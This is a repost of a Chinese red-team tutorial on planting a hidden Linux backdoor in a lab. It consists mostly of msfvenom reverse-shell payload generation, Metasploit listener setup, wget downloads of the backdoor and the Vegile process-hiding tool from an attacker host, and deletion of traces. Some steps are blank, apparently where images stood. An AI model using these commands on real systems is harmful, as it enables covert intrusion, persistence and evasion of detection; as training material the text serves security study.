ToB企服应用市场:ToB评测及商务社交产业平台

标题: 红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具 [打印本页]

作者: 汕尾海湾    时间: 2024-12-20 15:42
标题: 红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具
 

 
   欢迎各位彦祖与热巴畅游本人专栏与博客

  你的三连是我最大的动力

  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

    专栏跑道一

  
 

  ➡️网络空间安全——全栈前沿技术持续深入学习 

  

   
专栏跑道二


  
➡️ 24 Network Security -LJS 


  

  
​ 

  

    专栏跑道三

  
➡️ MYSQL REDIS Advance operation


  

    专栏跑道四

  
 

  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

  

    专栏跑道五

  
➡️RHCE-LJS[Linux高端骚操作实战篇]


    专栏跑道六

  
 

  ➡️数据布局与算法[考研+实际工作应用+C程序设计]

  

    专栏跑道七

  
 

  ➡️RHCSA-LJS[Linux初级及进阶骚技能]

  

  

 
上节回顾

 
   目次
  欢迎各位彦祖与热巴畅游本人专栏与博客
  你的三连是我最大的动力
  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
  专栏跑道一
  ➡️网络空间安全——全栈前沿技术持续深入学习 
  专栏跑道二
  ➡️ 24 Network Security -LJS 
  专栏跑道三
  ➡️ MYSQL REDIS Advance operation
  专栏跑道四
  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
  专栏跑道五
  ➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​
  专栏跑道六
  ➡️数据布局与算法[考研+实际工作应用+C程序设计]
  专栏跑道七
  ➡️RHCSA-LJS[Linux初级及进阶骚技能]
  上节回顾
  1.实战-Linux 无文件木马程序
  1.1环境准备
  按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
  再生成一个用来隐藏执行的后门
  补充:
   1.2启动 apache
  上传 Vegile 维吉尔工具到网站目次下方便 centos 下载
  注意:
  1.3获取 Linux 体系的 shell
  MSF 设置监听
  先安装下载工具
   添加执行权限
  利用 sessionID 连接 centos
  参数详解:
  注意:
  ​
  扩展:
  注意:
  ​
  1.4创建无文件后门程序
  补充:
  回到前面建立的 session 中下载用于隐藏历程的工具
  解压+cd+x
  下载用于隐藏执行的后门程序+x
  隐藏执行后门程序
  ​
  回到另一个 MSF 控制台查看 session
  ​
  查看一下我们注入到了哪个历程
  ​
   删除我们下载的所有文件
  注意:
  举例:
   
  
   
  

1.实战-Linux 无文件木马程序


1.1环境准备


    
  
  1.                                                                                                            ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=8080 -b "\x00" -f elf -o /var/www/html/xuegod-backdoor
  3. Found 3 compatible encoders
  4. Attempting to encode payload with 1 iterations of x64/xor
  5. x64/xor succeeded with size 175 (iteration=0)
  6. x64/xor chosen with final size 175
  7. Payload size: 175 bytes
  8. Final size of elf file: 295 bytes
  9. Saved as: /var/www/html/xuegod-backdoor
复制代码


再生成一个用来隐藏执行的后门

补充:
    
  
   
  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost                                             
  3. Found 3 compatible encoders
  4. Attempting to encode payload with 1 iterations of x64/xor
  5. x64/xor succeeded with size 175 (iteration=0)
  6. x64/xor chosen with final size 175
  7. Payload size: 175 bytes
  8. Final size of elf file: 295 bytes
  9. Saved as: /var/www/html/xuegod-ghost
复制代码

 1.2启动 apache

  1.                                                                                                                  
  2. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  3. └─#  systemctl start apache2
  4.                                                                                                                  
  5. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  6. └─# systemctl enable apache2   #设置开机启动,
  7. Synchronizing state of apache2.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
  8. Executing: /usr/lib/systemd/systemd-sysv-install enable apache2
  9. Created symlink '/etc/systemd/system/multi-user.target.wants/apache2.service' → '/usr/lib/systemd/system/apache2.service'.
  10.                                                                                                                  
  11. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  12. └─#  systemctl is-enabled apache2
  13. enabled
  14.          
复制代码

上传 Vegile 维吉尔工具到网站目次下方便 centos 下载

   
    注意:
    
  
  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  cd /var/www/html/
  3.                                                                                                                  
  4. ┌──(root㉿kali-2024)-[/var/www/html]
  5. └─# rz                  
复制代码


1.3获取 Linux 体系的 shell

MSF 设置监听

  1. msf6 exploit(windows/smb/psexec) > back
  2. msf6 >  use exploit/multi/handler
  3. [*] Using configured payload linux/x64/meterpreter/reverse_tcp
  4. msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
  5. payload => linux/x64/shell/reverse_tcp
  6. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  7. LHOST => 192.168.1.53
  8. msf6 exploit(multi/handler) > set LPORT 8080  #改成8080,防止和上面实验的 4444 端
  9. 口冲突
  10. LPORT => 8080
  11. msf6 exploit(multi/handler) >  exploit -j  #在后台运行 handler,发现现在并没有 session,
  12. 因为客户端还没有执行
复制代码

 
   
  先安装下载工具

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# wget 192.168.1.53/xuegod-backdoor
  3.                                                                                     
复制代码
 添加执行权限

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# chmod +x xuegod-backdoor     
  3.                              
复制代码
 
执行完成后获取到 session

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# ./xuegod-backdoor    
复制代码
利用 sessionID 连接 centos

  1. msf6 exploit(multi/handler) >  sessions -i 2
复制代码
参数详解:
    
  
  注意:
   
  

 
扩展:

   
  1. 查看网络连接状态:
  2. netstat -antup | grep 8080
复制代码

   
  1. ps -aux | grep 2406
复制代码

   
  

 
注意:
   
  

1.4创建无文件后门程序

补充:

   
  1. [-] Parse error: Unmatched quote: "' use exploit/multi/handler"
  2. msf6 > use exploit/multi/handler
  3. [*] Using configured payload linux/x64/shell/reverse_tcp
  4. msf6 exploit(multi/handler) >  set payload linux/x64/shell/reverse_tcp
  5. payload => linux/x64/shell/reverse_tcp
  6. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  7. LHOST => 192.168.1.53
  8. msf6 exploit(multi/handler) > set LPORT 4444
  9. LPORT => 4444
  10. msf6 exploit(multi/handler) > exploit -j
复制代码
回到前面建立的 session 中下载用于隐藏历程的工具

  1. wget 192.168.1.53/Vegile-master.zip
复制代码

解压+cd+x

  1. unzip Vegile-master.zip
  2. cd Vegile-master
  3. chmod +x Vegile
复制代码
下载用于隐藏执行的后门程序+x

  1. wget 192.168.1.53/xuegod-ghost
  2. chmod +x xuegod-ghost
复制代码
隐藏执行后门程序



   
  回到另一个 MSF 控制台查看 session



   
  查看一下我们注入到了哪个历程

  1. msf6 exploit(multi/handler) >  sessions -i 3
复制代码


   
  

 
 删除我们下载的所有文件

  1. rm -rf /root/Vegile-master
复制代码
  
  注意:

   
  举例:


 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4